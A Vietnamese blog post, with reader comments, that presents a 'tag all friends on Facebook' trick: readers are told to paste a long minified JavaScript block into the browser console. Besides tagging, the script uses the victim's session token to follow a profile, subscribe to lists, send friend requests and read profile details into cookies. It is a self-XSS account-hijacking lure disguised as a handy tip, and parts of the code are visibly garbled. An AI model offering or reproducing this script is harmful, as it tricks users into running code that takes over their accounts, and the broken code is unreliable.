Tag tất cả bạn bè vào hình ảnh, bài viết trên facebook

Akat Suki | 5:43 AM | 9 nhận xét

Cách tag từng người một vào một hình ảnh hay status nào đó trên facebook chắc chắn không còn xa lạ với mọi người rồi nhưng làm thế nào để tag toàn bộ bạn bè của mình vào bài viết hay một hình ảnh nào đó có lẽ bạn đã từng nghĩ tới và chưa biết cách nào để thực hiện được thì bài viết này sẻ hướng dẫn bạn làm được điều đó.

Tag tất cả bạn bè vào hình ảnh, bài viết trên facebook

Hướng dẫn Tag tất cả bạn bè vào hình ảnh, bài viết trên facebook
 • 1. Đăng nhập vào Facebook.com
 • 2. Viết 1 Status hay up một bức ảnh nào đó lên
 • 3. Đến trực tiếp liên kết Status, hay hình ảnh đã viết hay ảnh up lên...
 • 4. Ấn F12 hoặc Click chuột phải và chọn "kiểm tra phần tử", tại đây bạn chọn tab "Console" và dán toàn bộ code dưới đây vào đấy >> Enter và xem kết quả.
function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(document.cookie.split("cins"+user_id+"=").length<=1){cinsiyetgetir(e,t,"sarkadasekle")}else if(t==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1"){document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName("select")[0].value=="2"){document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString()}eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";header="ft_ent_identifier="+post_id+"&comment_text=�&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();for(var n=1;n=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement("html")

Chú ý: Thủ thuật này khá hay để các bạn làm những việc có ích chứ không nên lạm dụng tag lung tung gây khó chịu cho người khác nên các bạn hãy cân nhắc trước khi sử dụng.

Hy vọng thủ thuật nhỏ này sẻ hữu ích với bạn.

Chia sẻ bài viết này :

Category: ,

About Thủ Thuật Pro

 • Chào mừng bạn đến với website chia sẻ phần mềm bản quyền miễn phí, thủ thuật hay cho windows, internet, hình nền cho máy tính và nhiều điều thú vị khác đang chờ bạn khám phá :D
  Hy vọng những bài viết trên website bài viết sẻ hữu ích với bạn

  9 Comment Bằng Blogger
  Đăng Nhập Facebook Để Nhận Xét
  Hệ Thống Comment Blogger
  1. Cái này hay nhưng nhiều người lạm dụng nó để làm việc xấu ấy ad

   ReplyDelete
   Replies
   1. Um, một số bạn quá lạm dụng nó cũng hơi khó chịu thật, chắc chấp nhận thôi chứ giờ nói thiệt thì facebook nó cũng thành hố rác rồi :3

    Delete
  2. Cách này ko được nữa rồi bạn ơi. Mình vừa làm nhưng báo lỗi. hic hic..

   ReplyDelete
  3. sao mik` làm hk dk???? ai có thể giúp dk hk??

   ReplyDelete
   Replies
   1. Bạn chọn đúng thẻ "Console" trên trình duyệt và paste code bên trên vào có lúc 10 giây mới được hoặc lâu hơn 1 tí, nếu k dc bạn nên thử vài lần.

    Delete
  4. Cẩn thận khi sử dụng cái này nếu lạm dụng sẻ bị người dùng report và anh Mark khóa tài khoản đấy :3

   ReplyDelete
   Replies
   1. Cái này là bình thường, có mấy cái liên quan đến virus tag bậy bạ tùm lum mới lo, cái này chỉ tag tên thôi, cũng k có gì nguy hại mấy =))

    Delete